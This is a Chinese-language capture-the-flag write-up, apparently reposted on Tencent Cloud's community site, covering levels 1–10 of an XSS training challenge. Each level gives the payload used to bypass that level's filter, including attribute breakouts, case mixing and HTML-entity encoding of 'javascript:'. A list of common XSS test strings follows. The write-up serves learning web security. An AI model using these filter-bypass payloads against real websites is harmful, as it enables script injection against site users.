前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >xss tv wp

xss tv wp

作者头像
用户2700375
发布2022-06-09 14:18:37
1K0
发布2022-06-09 14:18:37
举报
文章被收录于专栏:很菜的web狗

xss题目 一共20题 难度也在递增吧 写一部分自己的解题过程

后面题目厉害了 慢慢更新(太菜不会做)

题目 payload不唯一呦

level1

没有任何过滤

Payload

代码语言:javascript
复制
<script>alert("xss")</script>

level2

记得以前xss这里曾请教过国光哥一些姿势

先输入

代码语言:javascript
复制
<img src=1 onerror=alert("xss")>

查看源码发现 value的值里使用了双引号 所以想到闭合前面的双引号。

Payload

代码语言:javascript
复制
"><img src=1 onerror=alert("xss")>

涉及基础

img为图片标签 src应该填写图片地址 如果图片地址不存在 就会触发onerror事件弹出xss

level3

试探性输入

代码语言:javascript
复制
<img src=1 onerror=alert("xss")>

查看源代码发现两端括号被实体化了 换个姿势

代码语言:javascript
复制
onclick=alert(1)

右键源代码 发现本身并没有被过滤 但是value里面使用了单引号 闭合就好

Payload

代码语言:javascript
复制
‘>onclick='alert(1)

level4

与level3类似

这题目value里面使用了双引号 闭合双引号就ok

Payload

代码语言:javascript
复制
"onclick="alert(1)"

level5

参考前面 直接输入payload

代码语言:javascript
复制
onclick=alert(1)

发现被过滤 大小写无法绕过 换个姿势

代码语言:javascript
复制
<a href=javascript:alert("xss")>

这时候查看源代码发现本身并没有过滤 都是一个套路闭合一下双引号即可

Payload

代码语言:javascript
复制
"><a href=javascript:alert("xss")>

level6

这题目前有点坑 与上题相似 单过滤了href src等属性

这里考虑到可以用大小写绕过

Payload

代码语言:javascript
复制
"><img SRC=1 ONERROR=alert(1)>

level7

随便写个payload

代码语言:javascript
复制
onclick=alert(1)

查看源代码发现 value有双引号 首先考虑到闭合

其次on被过滤为空 估计不会进行二次过滤

Payload

代码语言:javascript
复制
"onclick="alert(1)

level8

添加超链接到页面 本身在a标签里面所以我们payload如下

代码语言:javascript
复制
Javascript:alert(1)

发现并没弹窗 查看源代码发现javascript被过滤 试了很多都被过滤

想到html有字解码机制 试一下将过滤关键字实体化

字符实体转换

Payload

代码语言:javascript
复制
java&#115;cript:alert(1)

level9

这里始终不知道是怎么回事 看了xz的wp 得知这题自动检测url 如果发现没有带 http:// 则会显示不合法

还发现了过滤了双引号 还是利用html自解码机制将关键字实例化即可绕过

Payload

代码语言:javascript
复制
java&#115;cript:alert(&#34;http://&#34;)

level10

这题刚打开是懵逼的

然后又请教了国光哥

右键查看源文件 发现了三个隐藏参数 经过一个个试。

发现t_sort参数是控的 由于type="hidden"是隐藏的

on事件无效

所以应破坏掉type的hidden 之后利用 onclick 弹窗

Payload

代码语言:javascript
复制
keyword=1&t_sort=233%22%20onclick=alert(233)%20type=%22%22

XSS常用语句及编码绕过

常用的测试语句

代码语言:javascript
复制
<script>alert(1)</script>
<img src = 1 onerror = alert(1)>
<svg onload = alert(1)>
<a href = javascript:alert(1)>

常见的xss绕过编码

js编码

html实体编码

url编码

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-03-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • level1
    • Payload
    • level2
      • Payload
        • 涉及基础
        • level3
          • Payload
          • level4
            • Payload
            • level5
              • Payload
              • level6
                • Payload
                • level7
                  • Payload
                  • level8
                    • Payload
                    • level9
                      • Payload
                      • level10
                        • Payload
                        • XSS常用语句及编码绕过
                          • 常用的测试语句
                          • 常见的xss绕过编码
                          相关产品与服务
                          内容识别
                          内容识别(Content Recognition,CR)是腾讯云数据万象推出的对图片内容进行识别、理解的服务,集成腾讯云 AI 的多种强大功能,对存储在腾讯云对象存储 COS 的数据提供图片标签、图片修复、二维码识别、语音识别、质量评估等增值服务。
                          领券
                          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档